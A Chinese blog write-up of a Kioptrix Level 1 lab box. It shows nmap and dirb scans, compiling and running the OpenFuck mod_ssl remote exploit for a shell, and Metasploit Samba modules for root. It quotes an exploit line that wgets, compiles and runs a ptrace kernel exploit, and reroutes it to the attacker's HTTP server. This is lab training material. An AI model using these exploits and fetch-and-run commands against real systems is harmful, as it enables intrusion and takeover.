Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。

解决方式:每次下载好靶机先不导入VM,如果已经导入,需要“移除”靶机;然后通过修改靶机目录中的vm配置文件,删除所有ethernet0为首的行,之后,导入VM中,重新添加网络适配器并选择NAT模式,这样kali就能扫描到靶机了

kali IP:192.168.1.128

靶机IP:192.168.1.130

sudo nmap --min-rate 10000 -p- 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST

Nmap scan report for 192.168.1.130

Host is up (0.0023s latency).

Not shown: 65529 closed tcp ports (reset)

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

443/tcp  open  https

1024/tcp open  kdm


sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST

Nmap scan report for 192.168.1.130

Host is up (0.00036s latency).

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)

80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp  open  rpcbind     2 (RPC #100000)

139/tcp  open  netbios-ssn Samba smbd (workgroup: yMYGROUP)

443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

1024/tcp open  status      1 (RPC #100024)

MAC Address: 00:0C:29:7C:3A:16 (VMware)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 2.4.X

OS CPE: cpe:/o:linux:linux_kernel:2.4

OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

Network Distance: 1 hop

mod_ssl,OpenSSL,rpcbind,Samba 都可以进行尝试

搜索了一下rpcbind只有拒绝服务。

sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130

Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST

Nmap scan report for 192.168.1.130

Host is up (0.00025s latency).

PORT     STATE  SERVICE

22/udp   closed ssh

80/udp   closed http

111/udp  open   rpcbind

139/udp  closed netbios-ssn

443/udp  closed https

1024/udp closed unknown

UDP扫描一下有没有遗漏的服务

访问80端口和443端口,发现网络架构相同,和nmap扫描出的服务相同。

扫描目录:

sudo dirb http://192.168.1.130

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Fri Aug 18 10:18:03 2023

URL_BASE: http://192.168.1.130/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.130/ ----

+ http://192.168.1.130/~operator (CODE:403|SIZE:273)

+ http://192.168.1.130/~root (CODE:403|SIZE:269)

+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)

+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)

==> DIRECTORY: http://192.168.1.130/manual/

==> DIRECTORY: http://192.168.1.130/mrtg/

==> DIRECTORY: http://192.168.1.130/usage/                                                                                  

---- Entering directory: http://192.168.1.130/manual/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.130/mrtg/ ----

+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)                                                                

---- Entering directory: http://192.168.1.130/usage/ ----

+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)

radhat的默认首页和配置文档 没有利用点

看了一下apache 1.3.20有什么漏洞可以利用

searchsploit apache 1.3.20

mod_ssl=2.8.4<2.8.7,尝试使用

searchsploit -m 47080.c

  Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)

      URL: https://www.exploit-db.com/exploits/47080

     Path: /usr/share/exploitdb/exploits/unix/remote/47080.c

File Type: C source, ASCII text

gcc -o exploit 47080.c -lcrypto

47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录

   21 | #include <openssl/ssl.h>

      |          ^~~~~~~~~~~~~~~

compilation terminated.

下载依赖库之后重新编译

exploit中符合要求有0x6a,0x6b

sudo ./exploit 0x6a 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...

Good Bye!

 sudo ./exploit 0x6b 192.168.1.130 -c 50

*******************************************************************

* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *

*******************************************************************

* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *

* #hackarena  irc.brasnet.org                                     *

* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *

* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *

* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

*******************************************************************

Connection... 50 of 50

Establishing SSL connection

cipher: 0x4043808c   ciphers: 0x80f8068

Ready to send shellcode

Spawning shell...


bash: no job control in this shell

bash-2.05$

d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo

--23:19:52--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

           => `ptrace-kmod.c'

Connecting to dl.packetstormsecurity.net:443...

dl.packetstormsecurity.net: Host not found.

gcc: ptrace-kmod.c: No such file or directory

gcc: No input files

rm: cannot remove `ptrace-kmod.c': No such file or directory

bash: ./exploit: No such file or directory

bash-2.05$

检查权限

uname -a

Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

whoami;id

apache

uid=48(apache) gid=48(apache) groups=48(apache)

百度说是这个.c文件获取外网文件被墙 导致获取的不是root权限

Samba尝试 尝试了下 只有最有一个对139端口进行攻击 其他的利用模块都是针对mamba的服务端口443进行攻击的

use exploit/linux/samba/

Matching Modules

================

   #  Name                                     Disclosure Date  Rank       Check  Description

   -  ----                                     ---------------  ----       -----  -----------

   0  exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow

   1  exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)

   2  exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load

   3  exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow

   4  exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)

一般来说 系统赋予smb服务为root权限

samba/setinfopolicy_heap 信息策略审计时间堆溢出

Samba chain_reply内存损坏漏洞:该漏洞利用代码会损坏Samba 3.3.13以前版本中分配给响应数据包的内存,可通过传递超过目标缓冲区大小的值实现。

samba/is_known_pipename CVE-2017-7494,Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。Samba 允许连接一个远程的命名管道,并且在连接前会调用 is_known_pipename() 函数验证管道名称是否合法。在 is_known_pipename() 函数中,pipename并没有检查管道名称中的部分特殊字符,加载了使用该名称的动态链接库。导致攻击者可以构造一个恶意的动态链接库文件,执行任意代码。

Samba lsa_io_trans_names Heap Overflow 堆溢出

Samba trans2open溢出:这是Samba2.2.0版本到2.2.8版本中普遍存在的一个缓冲区溢出漏洞,其工作原理是利用没有noexec栈选项的x86 Linux机器中的漏洞。

配置好后run借助samba直接能拿到root权限

继续之前的mod_ssl进行,根据网上的思路 可以在128访问外网下载 exploit中130需访问的外网文件,通过更改exploit中,使130访问128临时开启的80端口下载文件,执行expoit获取root权限。

nl 47080.c|grep ptrace

    8   * Note: if required, host ptrace and replace wget target

  308  #define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

--2023-08-18 09:29:59--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

正在解析主机 dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200

正在连接 dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:3921 (3.8K) [text/x-csrc]

正在保存至: “ptrace-kmod.c”

ptrace-kmod.c                      100%[================================================================>]   3.83K  --.-KB/s  用时 0s      

2023-08-18 09:30:01 (131 MB/s) - 已保存 “ptrace-kmod.c” [3921/3921])

编写 47080.c ,然后重新编译,临时开启128的80服务,同时执行exploit

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -

Kioptrix Level 1的更多相关文章

  1. Kioptrix Level 2

    简介 Vulnhub是一个提供各种漏洞环境的靶场平台. 个人学习目的:1,方便学习更多类型漏洞.2,为OSCP做打基础. 下载链接 https://www.vulnhub.com/entry/kiop ...

  2. vulnhub 靶机 Kioptrix Level 1渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ kali ip 信息收集 先使用nmap收集目标的ip地址 nmap -sP 1 ...

  3. OSCP Learning Notes - Enumeration(1)

    Installing Kioptrix: Level 1 Download the vm machine form https://www.vulnhub.com/entry/kioptrix-lev ...

  4. OSCP Learning Notes - Exploit(1)

    Gaining Root with Metasploit Platform: Kali Linux, Kioptrix Level 1 1. Find the IP of Kioptirx nmap ...

  5. OSCP Learning Notes - Capstone(1)

    Kioptrix Level 1.1 Walkthrough Preparation: Download the virtual machine  from the following website ...

  6. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - File Transfers(2)

    Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...

  9. Java compiler level does not match解决方法

    从别的地方导入一个项目的时候,经常会遇到eclipse/Myeclipse报Description  Resource Path Location Type Java compiler level d ...

  10. Android requires compiler compliance level 5.0 or 6.0. Found '1.4' instead的解决办法

    今天在导入工程进Eclipse的时候竟然出错了,控制台输出的是: [2013-02-04 22:17:13 - takepicture] Android requires compiler compl ...

随机推荐

  1. Windows server 2012 安装ad域

    Windows server 2012 安装ad域   安装ad域(active directory)服务的作用:存储目录数据并管理域之间的通信,包括用户登录处理,身份验证和目录搜索等. 1.使用ad ...

  2. 【工作随手记】并发之synchronized

    synchronized对于java同学肯定都是耳熟能详的必修课了.但是不管对于新手还是老手都有一些容易搞错的点.这里权做一点记录. 锁的是代码还是对象? 同步块一般有两种写法. 1是直接加以方法体上 ...

  3. 自己动手写Docker学习笔记

    零.前言 本文为<自己动手写 Docker>的学习,对于各位学习 docker 的同学非常友好,非常建议买一本来学习. 书中有摘录书中的一些知识点,不过限于篇幅,没有全部摘录 (主要也是懒 ...

  4. 代码随想录算法训练营Day55 动态规划

    代码随想录算法训练营 代码随想录算法训练营Day55 动态规划| 392.判断子序列 115.不同的子序 392.判断子序列 题目链接:392.判断子序列 给定字符串 s 和 t ,判断 s 是否为 ...

  5. [MAUI]模仿Chrome下拉标签页的交互实现

    @ 目录 创建粘滞效果的圆控件 贝塞尔曲线绘制圆 创建控件 创建形变 可控形变 形变边界 形变动画 创建手势控件 创建页面布局 更新拖拽物位置 其它细节 项目地址 今天来说说怎样在.NET MAUI中 ...

  6. 由C# yield return引发的思考

    前言 当我们编写 C# 代码时,经常需要处理大量的数据集合.在传统的方式中,我们往往需要先将整个数据集合加载到内存中,然后再进行操作.但是如果数据集合非常大,这种方式就会导致内存占用过高,甚至可能导致 ...

  7. HiveSQL在使用聚合类函数的时候性能分析和优化详解

    概述 前文我们写过简单SQL的性能分析和解读,简单SQL被归类为select-from-where型SQL语句,其主要特点是只有map阶段的数据处理,相当于直接从hive中取数出来,不需要经过行变化. ...

  8. Linux系统运维之zabbix配置tomcat监控

    一.介绍 半年前安装的zabbix监控,当时配合异地的测试人员给A项目做压力测试,主要监控项目部署的几台服务器的内存.CPU信息,以及后来网络I/O等,也没考虑JVM:最近闲下来,想完善下监控,故留此 ...

  9. mysql处理delete后不释放磁盘空间

    myisam:optimize table table_name innodb:alter table table.name engine='innodb' 1. 问题描述在使用mysql的时候有时候 ...

  10. 微信小程序 WXSS模板样式,全局和页面配置,网络请求

    [黑马程序员前端微信小程序开发教程,微信小程序从基础到发布全流程_企业级商城实战(含uni-app项目多端部署)] https://www.bilibili.com/video/BV1834y1676 ...